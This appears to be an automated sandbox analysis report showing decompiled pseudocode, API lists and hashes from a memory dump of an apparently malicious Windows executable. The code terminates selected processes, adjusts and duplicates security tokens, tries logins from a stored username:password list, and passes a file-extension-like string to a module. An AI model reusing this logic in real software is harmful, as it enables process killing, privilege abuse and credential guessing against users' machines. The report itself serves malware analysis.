                                                                                        						 *(_t53 - 0x10) = 0;
                                                                                        						_t45 = _t53 - 0x2c;
                                                                                        						 *_t45 = 0x18;
                                                                                        						 *(_t45 + 4) = 0;
                                                                                        						 *(_t45 + 8) = 0;
                                                                                        						 *(_t45 + 0xc) = 0;
                                                                                        						 *(_t45 + 0x10) = 0;
                                                                                        						 *(_t45 + 0x14) = 0;
                                                                                        						if(NtOpenProcess(_t53 - 4, 1, _t53 - 0x2c, _t53 - 0x14) == 0) {
                                                                                        							 *0x40f708( *(_t53 - 4), 0);
                                                                                        							NtClose( *(_t53 - 4));
                                                                                        						}
                                                                                        					}
                                                                                        					_t41 = _t41 + _t51;
                                                                                        				} while (_t51 != 0);
                                                                                        				return RtlFreeHeap( *0x40f5d6, 0,  *(_t53 - 0xc));
                                                                                        				goto L14;
                                                                                        			}

                                                                                        APIs
                                                                                        • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400), ref: 004048AA
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,00000400), ref: 004048CD
                                                                                        • NtOpenProcess.NTDLL(004090AB,00000001,?,?), ref: 00404954
                                                                                        • NtTerminateProcess.NTDLL(004090AB,00000000), ref: 00404963
                                                                                        • NtClose.NTDLL(004090AB), ref: 0040496C
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00404984
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: HeapProcess$AllocateCloseFreeInformationOpenQuerySystemTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 2245525756-0
                                                                                        • Opcode ID: f7330f94261fe563ac1d793c3aa95f7df7714d39316cd2ac302f6c325cd95a44
                                                                                        • Instruction ID: d4a44320e30960affac830221f84e6ffc493adab8b490f365440909e9bd9fb0f
                                                                                        • Opcode Fuzzy Hash: f7330f94261fe563ac1d793c3aa95f7df7714d39316cd2ac302f6c325cd95a44
                                                                                        • Instruction Fuzzy Hash: C821F1B6900208EFDB11DF90DD44B9E7BB4FF44304F6084B6DA00BA1A1D7769A46DF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 84%
                                                                                        			E004048B6() {
                                                                                        				long _t28;
                                                                                        				void* _t41;
                                                                                        				intOrPtr* _t45;
                                                                                        				void _t51;
                                                                                        				void* _t53;
                                                                                        
                                                                                        				while(1) {
                                                                                        					_t28 = NtQuerySystemInformation(5,  *(_t53 - 0xc),  *(_t53 - 8), _t53 - 8);
                                                                                        					if(_t28 == 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					if(_t28 != 0xc0000004) {
                                                                                        						return RtlFreeHeap( *0x40f5d6, 0,  *(_t53 - 0xc));
                                                                                        					} else {
                                                                                        						 *(_t53 - 0xc) = RtlReAllocateHeap( *0x40f5d6, 0,  *(_t53 - 0xc),  *(_t53 - 8));
                                                                                        						continue;
                                                                                        					}
                                                                                        					L14:
                                                                                        				}
                                                                                        				_t41 =  *(_t53 - 0xc);
                                                                                        				do {
                                                                                        					_t51 =  *_t41;
                                                                                        					if( *((intOrPtr*)(_t41 + 0x3c)) != 0 && E00404993( *((intOrPtr*)(_t41 + 0x3c))) != 0) {
                                                                                        						 *(_t53 - 0x14) =  *((intOrPtr*)(_t41 + 0x44));
                                                                                        						 *(_t53 - 0x10) = 0;
                                                                                        						_t45 = _t53 - 0x2c;
                                                                                        						 *_t45 = 0x18;
                                                                                        						 *(_t45 + 4) = 0;
                                                                                        						 *(_t45 + 8) = 0;
                                                                                        						 *(_t45 + 0xc) = 0;
                                                                                        						 *(_t45 + 0x10) = 0;
                                                                                        						 *(_t45 + 0x14) = 0;
                                                                                        						if(NtOpenProcess(_t53 - 4, 1, _t53 - 0x2c, _t53 - 0x14) == 0) {
                                                                                        							 *0x40f708( *(_t53 - 4), 0);
                                                                                        							NtClose( *(_t53 - 4));
                                                                                        						}
                                                                                        					}
                                                                                        					_t41 = _t41 + _t51;
                                                                                        				} while (_t51 != 0);
                                                                                        				return RtlFreeHeap( *0x40f5d6, 0,  *(_t53 - 0xc));
                                                                                        				goto L14;
                                                                                        			}
                                                                                        APIs
                                                                                        • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400), ref: 004048AA
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,00000400), ref: 004048CD
                                                                                        • NtOpenProcess.NTDLL(004090AB,00000001,?,?), ref: 00404954
                                                                                        • NtTerminateProcess.NTDLL(004090AB,00000000), ref: 00404963
                                                                                        • NtClose.NTDLL(004090AB), ref: 0040496C
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00404984
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: HeapProcess$AllocateCloseFreeInformationOpenQuerySystemTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 2245525756-0
                                                                                        • Opcode ID: 502942dec87dcaec254f5c3f5d4315f0914e52bc62ba5990316bc4b51f652a24
                                                                                        • Instruction ID: d4a44320e30960affac830221f84e6ffc493adab8b490f365440909e9bd9fb0f
                                                                                        • Opcode Fuzzy Hash: 502942dec87dcaec254f5c3f5d4315f0914e52bc62ba5990316bc4b51f652a24
                                                                                        • Instruction Fuzzy Hash: C821F1B6900208EFDB11DF90DD44B9E7BB4FF44304F6084B6DA00BA1A1D7769A46DF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004072E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, long _a32) {
                                                                                        				void* _v8;
                                                                                        				long _v12;
                                                                                        				intOrPtr _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				intOrPtr _v28;
                                                                                        				intOrPtr _v32;
                                                                                        				intOrPtr _v36;
                                                                                        				void _v40;
                                                                                        
                                                                                        				_v12 = 0xffffffff;
                                                                                        				_v40 = _a4;
                                                                                        				_v36 = _a8;
                                                                                        				_v32 = _a12;
                                                                                        				_v28 = _a16;
                                                                                        				_v24 = _a20;
                                                                                        				_v20 = _a24;
                                                                                        				_v16 = _a28;
                                                                                        				_v8 = CreateThread(0, 0, E004072BC,  &_v40, 0, 0);
                                                                                        				if(_v8 != 0) {
                                                                                        					if(WaitForSingleObject(_v8, _a32) != 0x102) {
                                                                                        						GetExitCodeThread(_v8,  &_v12);
                                                                                        					} else {
                                                                                        						NtTerminateThread(_v8, 0);
                                                                                        					}
                                                                                        					NtClose(_v8);
                                                                                        				}
                                                                                        				return _v12;
                                                                                        			}
                                                                                        APIs
                                                                                        • CreateThread.KERNEL32(00000000,00000000,004072BC,?,00000000,00000000), ref: 0040732D
                                                                                        • WaitForSingleObject.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 00407342
                                                                                        • NtTerminateThread.NTDLL(00000000,00000000), ref: 00407354
                                                                                        • GetExitCodeThread.KERNEL32(00000000,FFFFFFFF,?,00000000,?,?,00000000), ref: 00407363
                                                                                        • NtClose.NTDLL(00000000), ref: 0040736C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Thread$CloseCodeCreateExitObjectSingleTerminateWait
                                                                                        • String ID:
                                                                                        • API String ID: 1797438295-0
                                                                                        • Opcode ID: 58eed08faf011ad016aacd7da90d8244a556d259883a75fe71c1a1fa6221bee6
                                                                                        • Instruction ID: ac80e1e9025d49e88988315da79a34fbbaebbe944a3b394ef96d7550ed6dec19
                                                                                        • Opcode Fuzzy Hash: 58eed08faf011ad016aacd7da90d8244a556d259883a75fe71c1a1fa6221bee6
                                                                                        • Instruction Fuzzy Hash: 1D21BF75A04208AFDB10DF98DD45BEEBBB4EB08310F204176F914E2290D375AE549B65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004054E0(intOrPtr _a4, intOrPtr _a8) {
                                                                                        				void* _v8;
                                                                                        				long _v12;
                                                                                        				intOrPtr _v16;
                                                                                        				void _v20;
                                                                                        
                                                                                        				_v12 = 0xffffffff;
                                                                                        				_v20 = _a4;
                                                                                        				_v16 = _a8;
                                                                                        				_v8 = CreateThread(0, 0, E004054BB,  &_v20, 0, 0);
                                                                                        				if(_v8 != 0) {
                                                                                        					if(WaitForSingleObject(_v8, 0xfa) != 0x102) {
                                                                                        						GetExitCodeThread(_v8,  &_v12);
                                                                                        					} else {
                                                                                        						NtTerminateThread(_v8, 0);
                                                                                        					}
                                                                                        					NtClose(_v8);
                                                                                        				}
                                                                                        				return _v12;
                                                                                        			}
                                                                                        APIs
                                                                                        • CreateThread.KERNEL32(00000000,00000000,004054BB,?,00000000,00000000), ref: 0040550F
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FA,?,?,00000000), ref: 00405526
                                                                                        • NtTerminateThread.NTDLL(00000000,00000000), ref: 00405538
                                                                                        • GetExitCodeThread.KERNEL32(00000000,FFFFFFFF,?,?,00000000), ref: 00405547
                                                                                        • NtClose.NTDLL(00000000), ref: 00405550
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Thread$CloseCodeCreateExitObjectSingleTerminateWait
                                                                                        • String ID:
                                                                                        • API String ID: 1797438295-0
                                                                                        • Opcode ID: 2a9cb9ff76254a5c6869bbfd06634bbf3f88277a162e436e1c3bffd0a084d49d
                                                                                        • Instruction ID: 54362d9fb5c9e0574f01021ebee95bafb627d955c36f9b033aed9caf6e27678e
                                                                                        • Opcode Fuzzy Hash: 2a9cb9ff76254a5c6869bbfd06634bbf3f88277a162e436e1c3bffd0a084d49d
                                                                                        • Instruction Fuzzy Hash: B1010971A40208FFEB20DF94DD4ABAEBB79EB04721F204176F910B62E0D7715A449A59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 91%
                                                                                        			E00409042(void* __fp0) {
                                                                                        				char _v8;
                                                                                        				long _v12;
                                                                                        				long _t6;
                                                                                        				void* _t23;
                                                                                        
                                                                                        				_t23 = __fp0;
                                                                                        				 *0x40f6bc(0x80000001,  &_v8);
                                                                                        				_t6 = E00402160();
                                                                                        				if( *0x40f5a5 != 0) {
                                                                                        					E00408995();
                                                                                        					_t6 = GetTickCount();
                                                                                        					_v12 = _t6;
                                                                                        				}
                                                                                        				if( *0x40f597 != 0) {
                                                                                        					_t6 = E00403E86();
                                                                                        				}
                                                                                        				_t13 =  *0x40f596;
                                                                                        				if( *0x40f596 != 0) {
                                                                                        					_t6 = E004046B1(_t13);
                                                                                        				}
                                                                                        				if( *0x40f59f != 0) {
                                                                                        					_t6 = E004046E2();
                                                                                        				}
                                                                                        				if( *0x40f59e != 0) {
                                                                                        					_t6 = E00404878();
                                                                                        				}
                                                                                        				_t16 =  *0x40f5a2;
                                                                                        				if( *0x40f5a2 != 0) {
                                                                                        					_t6 = E004039E3(_t16, ".2c9ccbf3");
                                                                                        				}
                                                                                        				if( *0x40f593 != 0) {
                                                                                        					_t6 = E00406EB7();
                                                                                        				}
                                                                                        				if( *0x40f594 != 0) {
                                                                                        					_t6 = E00407784();
                                                                                        				}
                                                                                        				if( *0x40f5a1 != 0) {
                                                                                        					_t6 = E0040314C(0x40f610);
                                                                                        				}
                                                                                        				if( *0x40f5a0 != 0) {
                                                                                        					_t6 = E004033B9( *0x40f5ce);
                                                                                        				}
                                                                                        				if( *0x40f5a5 != 0) {
                                                                                        					return E00408A8E(_t23, GetTickCount() - _v12);
                                                                                        				}
                                                                                        				return _t6;
                                                                                        			}

                                                                                        APIs
                                                                                        • NtSetThreadExecutionState.NTDLL(80000001,00409336), ref: 00409051
                                                                                          • Part of subcall function 00402160: NtOpenProcessToken.NTDLL(000000FF,00000028,0040905C), ref: 00402173
                                                                                          • Part of subcall function 00402160: NtQueryInformationToken.NTDLL(0040905C,00000003,?,00000004,?), ref: 00402190
                                                                                          • Part of subcall function 00402160: RtlAllocateHeap.NTDLL(00000008,?), ref: 004021A1
                                                                                          • Part of subcall function 00402160: NtQueryInformationToken.NTDLL(0040905C,00000003,00000000,?,?), ref: 004021BF
                                                                                          • Part of subcall function 00402160: NtAdjustPrivilegesToken.NTDLL(0040905C,00000000,00000000,00000000,00000000,00000000), ref: 004021F2
                                                                                          • Part of subcall function 00402160: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402203
                                                                                          • Part of subcall function 00402160: NtClose.NTDLL(0040905C), ref: 0040220C
                                                                                        • GetTickCount.KERNEL32 ref: 0040910A
                                                                                          • Part of subcall function 00408995: strlen.NTDLL ref: 004089D5
                                                                                          • Part of subcall function 00408995: strlen.NTDLL ref: 004089E1
                                                                                          • Part of subcall function 00408995: strlen.NTDLL ref: 004089EF
                                                                                          • Part of subcall function 00408995: strlen.NTDLL ref: 004089FF
                                                                                          • Part of subcall function 00408995: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00408A13
                                                                                          • Part of subcall function 00408995: sprintf.NTDLL ref: 00408A31
                                                                                          • Part of subcall function 00408995: RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00408A4E
                                                                                          • Part of subcall function 00408995: RtlFreeHeap.NTDLL(00000000,00000000,0040C004), ref: 00408A5F
                                                                                          • Part of subcall function 00408995: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00408A6E
                                                                                          • Part of subcall function 00408995: RtlFreeHeap.NTDLL(00000000,?), ref: 00408A7F
                                                                                        • GetTickCount.KERNEL32 ref: 0040906A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Tokenstrlen$AllocateCountInformationQueryTick$AdjustCloseExecutionOpenPrivilegesProcessStateThreadsprintf
                                                                                        • String ID: .2c9ccbf3
                                                                                        • API String ID: 2596900045-3269262987
                                                                                        • Opcode ID: ab62d4ac0d1b5524308dd87d599f83c5a19adebb95daa45a5da53e39ac05f46f
                                                                                        • Instruction ID: 9accfe5e45c5b31474c2340133867f7ef8fcb3675aee7ec44679ca29e4112870
                                                                                        • Opcode Fuzzy Hash: ab62d4ac0d1b5524308dd87d599f83c5a19adebb95daa45a5da53e39ac05f46f
                                                                                        • Instruction Fuzzy Hash: 961151A080828079FB36BBB5AE0E79A3E845705308F08057FA544719F3DA7D099CC75F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 20%
                                                                                        			E00401AE1(char _a4) {
                                                                                        				void _v8;
                                                                                        				char _v32;
                                                                                        				intOrPtr* _t12;
                                                                                        				void* _t20;
                                                                                        
                                                                                        				_t20 = 0;
                                                                                        				_t12 =  &_v32;
                                                                                        				 *_t12 = 0x18;
                                                                                        				 *((intOrPtr*)(_t12 + 4)) = 0;
                                                                                        				 *((intOrPtr*)(_t12 + 8)) = 0;
                                                                                        				 *((intOrPtr*)(_t12 + 0xc)) = 0;
                                                                                        				 *((intOrPtr*)(_t12 + 0x10)) = 0;
                                                                                        				 *((intOrPtr*)(_t12 + 0x14)) = 0;
                                                                                        				_push( &_v8);
                                                                                        				_push(2);
                                                                                        				_push(0);
                                                                                        				_push( &_v32);
                                                                                        				_push(0xc);
                                                                                        				_t9 =  &_a4; // 0x4071ef
                                                                                        				_push( *_t9);
                                                                                        				if( *0x40f6b4() == 0) {
                                                                                        					if(NtSetInformationThread(0xfffffffe, 5,  &_v8, 4) == 0) {
                                                                                        						_t20 = 1;
                                                                                        					}
                                                                                        					NtClose(_v8);
                                                                                        				}
                                                                                        				return _t20;
                                                                                        			}

                                                                                        APIs
                                                                                        • NtDuplicateToken.NTDLL(q@,0000000C,?,00000000,00000002,00000000), ref: 00401B2B
                                                                                        • NtSetInformationThread.NTDLL(000000FE,00000005,005C003F,00000004), ref: 00401B3F
                                                                                        • NtClose.NTDLL(005C003F), ref: 00401B4D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CloseDuplicateInformationThreadToken
                                                                                        • String ID: q@
                                                                                        • API String ID: 1566617950-2764676539
                                                                                        • Opcode ID: eba7002e426f32c7822c45e36ded9257523e95c4d91753086f36417129bd1fd2
                                                                                        • Instruction ID: 5e5483981f39e58ef949d31c92621efebf9b249b1a87a9bb698d64c50a883e61
                                                                                        • Opcode Fuzzy Hash: eba7002e426f32c7822c45e36ded9257523e95c4d91753086f36417129bd1fd2
                                                                                        • Instruction Fuzzy Hash: 050125B1600208AFF7108F55DD49FABBBBCFB40714F108175E615DB1E1E77599088BA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 26%
                                                                                        			E00402003(intOrPtr _a4) {
                                                                                        				long _v8;
                                                                                        				long _v12;
                                                                                        				void* _v16;
                                                                                        				void* _t24;
                                                                                        				void* _t26;
                                                                                        				void* _t27;
                                                                                        
                                                                                        				_v8 = 0;
                                                                                        				 *0x40f6d0(_a4, 2,  &_v16, 4,  &_v12);
                                                                                        				_v16 = RtlAllocateHeap( *0x40f5d6, 8, _v12);
                                                                                        				if(_v16 != 0) {
                                                                                        					_t24 =  *0x40f6d0(_a4, 2, _v16, _v12,  &_v12);
                                                                                        					if(_t24 == 0) {
                                                                                        						_t27 = _v16;
                                                                                        						asm("lodsd");
                                                                                        						_t26 = _t24;
                                                                                        						while(1) {
                                                                                        							asm("lodsd");
                                                                                        							if( *((intOrPtr*)(_t24 + 8)) == 0x15 &&  *((intOrPtr*)(_t24 + 0x18)) == 0x200) {
                                                                                        								break;
                                                                                        							}
                                                                                        							_t27 = _t27 + 4;
                                                                                        							_t26 = _t26 - 1;
                                                                                        							if(_t26 != 0) {
                                                                                        								continue;
                                                                                        							}
                                                                                        							goto L7;
                                                                                        						}
                                                                                        						_v8 = 1;
                                                                                        					}
                                                                                        					L7:
                                                                                        					RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                        				}
                                                                                        				return _v8;
                                                                                        			}

                                                                                        APIs
                                                                                        • NtQueryInformationToken.NTDLL(?,00000002,?,00000004,?), ref: 00402024
                                                                                        • RtlAllocateHeap.NTDLL(00000008,?), ref: 00402035
                                                                                        • NtQueryInformationToken.NTDLL(?,00000002,00000000,?,?), ref: 00402053
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040208F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: HeapInformationQueryToken$AllocateFree
                                                                                        • String ID:
                                                                                        • API String ID: 3129818708-0
                                                                                        • Opcode ID: 6b934a7c4723fc65dd6ac94149b55f2cd4126db01ad4abc1f488d9e441de1e46
                                                                                        • Instruction ID: d1d79e42df92fa8735640151846709503bd13b6252c6febf841f31e72f1c97b0
                                                                                        • Opcode Fuzzy Hash: 6b934a7c4723fc65dd6ac94149b55f2cd4126db01ad4abc1f488d9e441de1e46
                                                                                        • Instruction Fuzzy Hash: 64115B72900208FFEB208F90DD49FAEBB78EB04311F0080B6EA11B61B0D7B65A48DB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040221B() {
    void* _v8;
    short _v264;
    wchar_t* _t14;
    signed int _t15;
    wchar_t* _t21;
    wchar_t* _t22;
    void* _t23;
    void* _t25;

    _v8 = 0;
    _t22 =  *0x40f5ca; // 0x0
    while(1) {
        wcscpy( &_v264, _t22);
        _t14 = wcschr( &_v264, 0x3a);
        _t25 = _t23 + 0x10;
        _t21 = _t14;
        if(_t21 == 0) {
            goto L4;
        }
         *_t21 = 0;
        _t5 =  &(_t21[0]); // 0x2
        if(LogonUserW( &_v264, 0, _t5, 4, 0,  &_v8) == 0) {
            goto L4;
        } else {
        }
        L7:
        return _v8;
        L4:
        _t15 = wcslen(_t22);
        _t23 = _t25 + 4;
        _t22 = _t22 + 2 + _t15 * 2;
        if( *_t22 != 0) {
            continue;
        } else {
        }
        goto L7;
    }
}

APIs
• wcscpy.NTDLL ref: 0040223E
• wcschr.NTDLL ref: 00402250
• LogonUserW.ADVAPI32(?,00000000,00000002,00000004,00000000,00000000), ref: 00402279
• wcslen.NTDLL ref: 00402286
Memory Dump Source
• Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
Similarity
• API ID: LogonUserwcschrwcscpywcslen
• String ID:
• API String ID: 77989123-0
• Opcode ID: dc340d6d3e73c6da2fd94945512381a75e7c7855182f97008de3c7caec22c087
• Instruction ID: 1f90d4305b6831fd899317fec0e93dc63310a76d1126cb4740fbbbd9239c647d
• Opcode Fuzzy Hash: dc340d6d3e73c6da2fd94945512381a75e7c7855182f97008de3c7caec22c087
• Instruction Fuzzy Hash: 960188B1500214ABD720DBD4EE49FA673BCEF44310F5001BAFA05F71D0E7B59A5987AA
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00407EFB() {
    long _v8;
    void* _v12;

    if( *0x40f5ea != 0) {
        E00401AE1( *0x40f5ea);
    }
    _v12 = 0;
    _v8 = 0;
    GetUserNameW(0,  &_v8);
    _v12 = RtlAllocateHeap( *0x40f5d6, 8, _v8 * 2);
    if(_v12 != 0 && GetUserNameW(_v12,  &_v8) == 0) {
        RtlFreeHeap( *0x40f5d6, 0, _v12);
        _v12 = 0;
    }
    if( *0x40f5ea != 0) {
        E00401B60();
    }
    return _v12;
}

APIs
• GetUserNameW.ADVAPI32(00000000,00000000), ref: 00407F2E
• RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00407F47
• GetUserNameW.ADVAPI32(00000000,00000000), ref: 00407F5D
• RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407F72
  • Part of subcall function 00401AE1: NtDuplicateToken.NTDLL(q@,0000000C,?,00000000,00000002,00000000), ref: 00401B2B
  • Part of subcall function 00401AE1: NtSetInformationThread.NTDLL(000000FE,00000005,005C003F,00000004), ref: 00401B3F
  • Part of subcall function 00401AE1: NtClose.NTDLL(005C003F), ref: 00401B4D
Memory Dump Source
• Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
Similarity
• API ID: HeapNameUser$AllocateCloseDuplicateFreeInformationThreadToken
• String ID:
• API String ID: 2107901798-0
• Opcode ID: 25b5823d5ebd4866a3a75bd7b7b4197738dbfe412c23cd668c496383f58b7cd3
• Instruction ID: 78f9a7b40b181f204d846800204ce906ded57a62196d74910c9203039bce1971
• Opcode Fuzzy Hash: 25b5823d5ebd4866a3a75bd7b7b4197738dbfe412c23cd668c496383f58b7cd3
• Instruction Fuzzy Hash: E1110971A04208FFEB20DFA4ED49BAE7BB8FB44315F104176E404B16E0D7792A49DB59
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
E004055D1() {
    long _t29;
    void* _t32;
    void* _t38;
    void* _t41;
    intOrPtr* _t50;
    void* _t53;
    void* _t55;
    void* _t58;

    while(1) {
        _t29 = NtQueryObject(0, 3,  *(_t55 - 0xc),  *(_t55 - 0x10), _t55 - 0x10);
        if(_t29 == 0) {
            break;
        }
        if(_t29 != 0xc0000004) {
            return RtlFreeHeap( *0x40f5d6, 0,  *(_t55 - 0xc));
        } else {
             *(_t55 - 0x10) =  *(_t55 - 0x10) + 0x28;
             *(_t55 - 0xc) = RtlReAllocateHeap( *0x40f5d6, 0,  *(_t55 - 0xc),  *(_t55 - 0x10));
            continue;
        }
        L17:
    }
    _t50 = _t55 - 0x1c;
     *_t50 = 0x690046;
     *((intOrPtr*)(_t50 + 4)) = 0x65006c;
     *(_t50 + 8) = 0;
    _t53 =  *(_t55 - 0xc);
    asm("lodsd");
     *(_t55 - 8) = _t29;
    _t41 = 0;
    while(1) {
        _t32 =  *0x40f694( *((intOrPtr*)(_t53 + 4)), _t50);
        _t58 = _t58 + 8;
        if(_t32 == 0) {
            break;
        }
        _t53 = (( *(_t53 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc) + _t53 + 0x60;
        _t41 = _t41 + 1;
         *(_t55 - 8) =  *(_t55 - 8) - 1;
        if( *(_t55 - 8) != 0) {
            continue;
        }
        L16:
        RtlFreeHeap( *0x40f5d6, 0,  *(_t55 - 0xc));
        return  *(_t55 - 4);
        goto L17;
    }
    _t38 = E004016D2();
    if(_t38 < 0x3f) {
        if(_t38 < 0x3d) {
             *(_t55 - 4) = _t41 + 1;
        } else {
             *(_t55 - 4) = _t41 + 2;
        }
    } else {
         *(_t55 - 4) =  *(_t53 + 0x52) & 0x000000ff;
    }
    goto L16;
}

APIs
• NtQueryObject.NTDLL(00000000,00000003,?,00000400,00000400), ref: 0040559F
• RtlReAllocateHeap.NTDLL(00000000,?,00000028), ref: 004055C6
• _wcsicmp.NTDLL ref: 00405613
• RtlFreeHeap.NTDLL(00000000,?), ref: 0040566B
Memory Dump Source
• Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
• Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
